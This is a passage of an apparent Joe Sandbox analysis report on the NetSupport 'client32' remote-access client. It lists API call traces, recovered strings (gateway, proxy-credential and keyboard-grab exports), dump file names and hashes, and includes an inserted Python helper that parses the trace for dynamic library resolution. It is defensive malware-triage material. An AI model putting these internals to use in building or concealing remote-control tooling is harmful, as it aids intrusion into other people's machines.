• Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859658E
• GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859659E
• _memset.LIBCMT ref: 685965C8
• LeaveCriticalSection.KERNEL32(?,?,6859D77B,00000000), ref: 685965D7
• LeaveCriticalSection.KERNEL32(685DB898,?,00000000,?,6859D77B,00000000), ref: 685965F2
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
• Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
• String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
• API String ID: 3764039262-2631155478
• Opcode ID: 46e70ae2b76cb51ca48c480c54ac7e9f41fd60fc7245b0e472c8da1468b8f531
• Instruction ID: 369a002f3b48f126020b325555e63da1069fb9b65c6b3de85ce35cf1eb95a096
• Opcode Fuzzy Hash: 46e70ae2b76cb51ca48c480c54ac7e9f41fd60fc7245b0e472c8da1468b8f531
• Instruction Fuzzy Hash: 46518275640340AFDB10EFA8C888B9A77F9EF89315FD14515EE1AD7280DB70E888CB95

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
• Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: _strncmp
• String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
• API String ID: 909875538-2848211065
• Opcode ID: c0ddaf445a32a1138975d6a5c9697123393f874da37b6a50d6b6ae8a1c164734
• Instruction ID: 2ef811b70579311959dfd9ad39713bda9f9f37d801767944afe4c474126e2712
• Opcode Fuzzy Hash: c0ddaf445a32a1138975d6a5c9697123393f874da37b6a50d6b6ae8a1c164734
• Instruction Fuzzy Hash: FCD1DD75A042559FDF20CF68CC84BEEBBB5AF4A314F8440D9D81D9B242D7319A84CF92

Control-flow Graph
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,73AF1370,?,0000001A), ref: 1102837D
• _strrchr.LIBCMT ref: 1102838C
  • Part of subcall function 11160E4E: __stricmp_l.LIBCMT ref: 11160E8B
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: FileModuleName__stricmp_l_strrchr
• String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
• API String ID: 1609618855-357498123
• Opcode ID: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
• Instruction ID: 3ecfaec1c78aa64732578d28134276498dc59d4967fe96fbd16849b56c65f872
• Opcode Fuzzy Hash: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
• Instruction Fuzzy Hash: 0E12E33ED052A78BDB55CF24CC807D8B7F4AB1A308F4440EAE99597205EB719786CB92

Control-flow Graph
APIs
• GetTickCount.KERNEL32 ref: 685A6BD5
• GetTickCount.KERNEL32 ref: 685A6C26
• Sleep.KERNEL32(00000064), ref: 685A6C5B
  • Part of subcall function 685A6940: GetTickCount.KERNEL32 ref: 685A6950
• WaitForSingleObject.KERNEL32(00000300,?), ref: 685A6C7C
• _memmove.LIBCMT ref: 685A6C93
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 685A6CB4
• Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 685A6CD9
• GetTickCount.KERNEL32 ref: 685A6CEC
• _calloc.LIBCMT ref: 685A6D76
• GetTickCount.KERNEL32 ref: 685A6DF3
• InterlockedExchange.KERNEL32(02D42F1A,00000000), ref: 685A6E01
• _calloc.LIBCMT ref: 685A6E33
• _memmove.LIBCMT ref: 685A6E47
• InterlockedDecrement.KERNEL32(02D42EC2), ref: 685A6EC3
• SetEvent.KERNEL32(00000304), ref: 685A6ECF
• _memmove.LIBCMT ref: 685A6EF4
• GetTickCount.KERNEL32 ref: 685A6F4F
• InterlockedExchange.KERNEL32(02D42E62,-685DA188), ref: 685A6F60
Strings
• httprecv, xrefs: 685A6BDD
• e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 685A6E62
• ResumeTimeout, xrefs: 685A6BBA
• ProcessMessage returned FALSE. Terminating connection, xrefs: 685A6F25
• FALSE, xrefs: 685A6E67
• ReadMessage returned FALSE. Terminating connection, xrefs: 685A6F3A
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
• String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
• API String ID: 1449423504-919941520
• Opcode ID: 115160e606d15e04964988cc5f3d42d282596d0551780c349f8adbf61502a5e1
• Instruction ID: 5768964ac529070e8d603857501e83de661ed71089ed95d69a90bef8bcf9960d
• Opcode Fuzzy Hash: 115160e606d15e04964988cc5f3d42d282596d0551780c349f8adbf61502a5e1
• Instruction Fuzzy Hash: B7B1A0B5D002549FDF20DB68CC84BEEB7B4EB49344F81409AEA59A7240E7B49EC4CF95

Control-flow Graph
APIs
• LoadLibraryA.KERNEL32(?,00000001,?), ref: 110858CC
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110858EA
• LoadLibraryA.KERNEL32(?), ref: 1108592C
• GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11085947
• GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108595C
• GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108596D
• GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108597E
• GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108598F
• GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 110859A0
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$FileModuleName
• String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
• API String ID: 2201880244-3035937465
• Opcode ID: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
• Instruction ID: e9fa9a36c663d757a0c8add56282bddb088a97f97ce07886abf3270b6b50a9db
• Opcode Fuzzy Hash: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
• Instruction Fuzzy Hash: C051DE70E0431AAFD710DF79C880AAAFBF8AF49304B2185AAE8D5C7244EB71E441CF51

Control-flow Graph
Function 11136060: basic blocks 11136060 through 111364b1, common exit block 111364a2-111364b1 (call 1115e4d1). Win32 calls inside the graph: PostMessageA, SetWindowTextA, IsWindowVisible, GetForegroundWindow, SetForegroundWindow, EnableWindow. Internal subcalls: 11141710, 1105d340, 11062d60, 111299f0, 110e8150, 1110c270, 1112d530, 111434d0, 11129bf0, 1115e091, 1112eba0, 1113f4f0, 111434f0, 11132620, 1112e330, 11142150, 110f61e0, 1115e4d1. (Rendered graph and its executed/not-executed block colouring not reproduced.)
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
                                                                                                                                                                                                      • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                      • Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
                                                                                                                                                                                                      • Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,000006CF,00000007,00000000), ref: 1113623F
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • SetWindowTextA.USER32(0007036E,00000000), ref: 111362E7
                                                                                                                                                                                                    • IsWindowVisible.USER32(0007036E), ref: 111363AC
                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 111363CC
                                                                                                                                                                                                    • IsWindowVisible.USER32(0007036E), ref: 111363DA
                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 11136408
                                                                                                                                                                                                    • EnableWindow.USER32(0007036E,00000001), ref: 11136417
                                                                                                                                                                                                    • IsWindowVisible.USER32(0007036E), ref: 11136468
                                                                                                                                                                                                    • IsWindowVisible.USER32(0007036E), ref: 11136475
                                                                                                                                                                                                    • EnableWindow.USER32(0007036E,00000000), ref: 11136489
                                                                                                                                                                                                    • EnableWindow.USER32(0007036E,00000000), ref: 111363EF
                                                                                                                                                                                                      • Part of subcall function 1112E330: ShowWindow.USER32(0007036E,00000000,?,11136492,00000007,?,?,?,?,?,00000000,?,?,?,?,?), ref: 1112E354
                                                                                                                                                                                                    • EnableWindow.USER32(0007036E,00000001), ref: 1113649D
                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                                                                                                                    • String ID: @r$Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                                                                                                                    • API String ID: 3453649892-2668506982
                                                                                                                                                                                                    • Opcode ID: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
                                                                                                                                                                                                    • Instruction ID: e84f8c9860d0a84ca21d0dbcc5e0864e350968dbdf20df23b648977f69907e2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02C13C75F113259BEB02DFE4CD85BAEF7A6AB8032DF104438D9159B288EB31E944C791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 11105EDB
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001), ref: 1110C2C7
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11105EEF
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11105EFF
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000003C), ref: 11105F1B
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111EC5C4), ref: 11105F26
                                                                                                                                                                                                      • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                                                                                                      • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105F69
                                                                                                                                                                                                      • Part of subcall function 1109DCF0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                                                                                                      • Part of subcall function 1109DCF0: OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                                                                                                      • Part of subcall function 1109DCF0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105FBA
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 1110600F
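Added example, not part of the Joe Sandbox report and not NetSupport code: a small Python triage helper that parses the APIs listing above and recovers from it the LoadLibraryA -> GetProcAddress -> FreeLibrary sequence (with the resolved export names GrabKM and LoggedOn) and the named kernel objects and DLLs the routine or its callees reference (the nsm_gina_sas event, Wtsapi32.dll, Advapi32.dll). The line layout it parses (an optional "Part of subcall function X:" prefix, Api.MODULE(args), then "ref: address") is an assumption taken from how the entries are rendered on this page; the embedded input is the listing above, transcribed. Only what the trace shows is reported: the LoadLibraryA argument is "?", so the DLL name does not come from the APIs column (the String IDs below list \pcigina).

```python
import re
from dataclasses import dataclass

# Sample input: the "APIs" list of the client32 routine above, transcribed from
# the report. "Part of subcall function X:" marks a call made by a callee.
SAMPLE_API_LINES = """\
Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
CloseHandle.KERNEL32(00000000), ref: 11105E29
GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
LoadLibraryA.KERNEL32(?), ref: 11105E71
GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
FreeLibrary.KERNEL32(?), ref: 11105EDB
Part of subcall function 1110C2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001), ref: 1110C2C7
Part of subcall function 1110C2B0: CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1110C2EA
Part of subcall function 1110C2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C317
Part of subcall function 1110C2B0: CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C321
GetStockObject.GDI32(0000000D), ref: 11105EEF
GetObjectA.GDI32(00000000,0000003C,?), ref: 11105EFF
InitializeCriticalSection.KERNEL32(0000003C), ref: 11105F1B
InitializeCriticalSection.KERNEL32(111EC5C4), ref: 11105F26
Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105F69
Part of subcall function 1109DCF0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
Part of subcall function 1109DCF0: OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
Part of subcall function 1109DCF0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105FBA
CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 1110600F
"""

# Assumed layout: optional "Part of subcall function X: " prefix, Api.MODULE(args)
# or bare Api.MODULE, then ", ref: ADDR" or " ref: ADDR".
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<callee>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)\s*$")
HEX8 = re.compile(r"^[0-9A-F]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    callee: str  # "" when the function itself makes the call


def parse_api_lines(text):
    """Parse the report listing; lines that do not match the layout are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("callee") or ""))
    return calls


def symbolic_args(call):
    """Arguments that are neither '?', raw hex nor IDA 'Function_' labels, i.e.
    the string literals the disassembler recovered (export and object names)."""
    return [a for a in call.args
            if a != "?" and not HEX8.match(a) and not a.startswith("Function_")]


def direct_calls(calls):
    """Calls made by the function itself, in program order (by reference address)."""
    return sorted((c for c in calls if not c.callee), key=lambda c: c.ref)


def find_dynamic_resolution(calls):
    """Windows of LoadLibrary* -> GetProcAddress... -> FreeLibrary among the direct
    calls; each window records the export names resolved before the free."""
    windows, current = [], None
    for c in direct_calls(calls):
        if c.api.startswith("LoadLibrary"):
            current = {"load_ref": c.ref, "exports": [], "freed": False}
            windows.append(current)
        elif current is not None and c.api == "GetProcAddress":
            current["exports"].extend(symbolic_args(c))
        elif current is not None and c.api == "FreeLibrary":
            current["freed"] = True
            current = None
    return windows


def named_objects(calls):
    """Named events/mutexes and DLLs loaded by name, anywhere in the listing."""
    out = {}
    for c in calls:
        if c.api in ("OpenEventA", "CreateEventA", "OpenMutexA", "CreateMutexA") \
                or c.api.startswith("LoadLibrary"):
            for name in symbolic_args(c):
                out.setdefault(c.api, []).append(name)
    return out


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    print(find_dynamic_resolution(parsed))
    print(named_objects(parsed))
```

Run stand-alone it reports one resolution window starting at 11105E71 with exports ["GrabKM", "LoggedOn"] and freed set, plus {"OpenEventA": ["nsm_gina_sas"], "LoadLibraryA": ["Wtsapi32.dll", "Advapi32.dll"]}. Sorting direct calls by reference address matters because the report does not always list calls in program order (compare the EnableWindow entries of the previous function); subcall entries are kept separate so that a LoadLibraryA in a callee is not mistaken for the routine's own window.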
                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_memsetwsprintf
• String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf
• String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<Zh
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 11030450
• GetProcAddress.KERNEL32(00000000), ref: 11030457
• GetNativeSystemInfo.KERNEL32(?), ref: 11030465
• GetStockObject.GDI32(0000000D), ref: 11030672
• GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
• SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
• SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
• InterlockedExchange.KERNEL32(00728D58,00001388), ref: 11030746
• GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorModeObject$AddressExchangeHandleInfoInterlockedModuleNativeProcStockSystem
• String ID: .%d$Error %s unloading audiocap dll$GetNativeSystemInfo$kernel32.dll$pcicl32
APIs
  • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
• RegCloseKey.KERNEL32(?), ref: 110303C3
• GetStockObject.GDI32(0000000D), ref: 11030672
• GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
• SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
• SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
• InterlockedExchange.KERNEL32(00728D58,00001388), ref: 11030746
• GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
  • Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorModeObject$CloseExchangeInterlockedQueryStockValue__isdigit_l
